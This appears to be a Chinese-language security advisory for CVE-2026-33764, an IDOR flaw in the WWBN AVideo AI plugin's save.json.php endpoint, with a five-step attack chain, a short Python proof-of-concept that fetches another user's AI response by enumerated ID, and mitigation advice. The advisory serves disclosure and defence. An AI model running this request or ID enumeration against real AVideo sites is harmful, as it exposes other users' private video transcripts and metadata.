IPBUF安全漏洞报告
English
CVE-2026-33764 CVSS 4.3 中危

CVE-2026-33764 AVideo信息泄露漏洞

披露日期: 2026-03-27

漏洞信息

漏洞编号
CVE-2026-33764
漏洞类型
IDOR (不安全的直接对象引用)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

IDOR信息泄露AVideo权限绕过CVE-2026-33764

漏洞概述

WWBN AVideo 26.0及之前版本存在信息泄露漏洞。由于AI插件未正确验证用户权限,经过认证的攻击者可利用`save.json.php`接口,通过篡改ID参数访问其他用户私有视频的AI生成数据,导致敏感信息泄露。

技术细节

该漏洞属于典型的IDOR(不安全的直接对象引用)漏洞。漏洞点位于AI插件的`save.json.php`文件中。该文件负责处理AI生成内容的保存和读取。开发人员在编写代码时,仅依据`$_REQUEST['id']`参数来从数据库中检索AI响应对象,而忽略了关键的权限校验步骤,即未验证当前发起请求的用户是否是该AI响应对象所属视频的所有者。利用该漏洞的前提条件是攻击者必须拥有一个合法的账户,并且该账户被分配了使用AI插件的权限。在攻击场景中,攻击者通过遍历ID或预测ID的方式,构造包含受害者视频AI响应ID的HTTP请求。由于服务端缺乏校验,攻击者能够成功获取到受害者私有视频的AI分析结果(如自动生成的标题、描述、关键词、摘要及完整转录文本)。随后,攻击者可以将这些敏感信息应用到自己的视频库中,从而实现了对非授权数据的窃取。

攻击链分析

STEP 1
1. 身份认证
攻击者注册或使用一个已拥有AI插件使用权限的低权限账户登录系统。
STEP 2
2. 侦察与枚举
攻击者分析网络请求,发现`save.json.php`接口接受`id`参数,并尝试枚举或猜测其他用户私有视频的AI响应ID。
STEP 3
3. 发起恶意请求
攻击者构造HTTP请求,向`save.json.php`发送包含受害者AI响应ID的参数。
STEP 4
4. 数据窃取
服务器由于缺乏所有权验证,直接返回了受害者的AI生成内容(如转录文本、标题等)。
STEP 5
5. 数据利用
攻击者将获取到的敏感信息保存或应用到自己的视频中,完成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target endpoint for the AI plugin url = "https://target-site.com/plugin/AI/save.json.php" # Attacker's session cookie (Authenticated user with AI permissions) cookies = {'PHPSESSID': 'valid_attacker_session_id'} # The ID of the AI response object belonging to a victim's private video # This ID is typically an integer that can be enumerated victim_ai_id = "1001" # Parameters to send the request params = { 'id': victim_ai_id, 'videos_id': '0' # Setting 0 or attacker's video ID to retrieve data } response = requests.get(url, params=params, cookies=cookies) if response.status_code == 200: print("[+] Exploit successful!") print("[+] Leaked AI Data:") print(response.json()) else: print("[-] Exploit failed")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施
建议立即检查并更新WWBN AVideo至官方提供的最新修复版本。如果暂时无法升级,应考虑禁用AI插件功能或通过WAF等安全设备拦截对`save.json.php`接口的异常请求,特别是对`id`参数的遍历行为,以防止数据进一步泄露。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表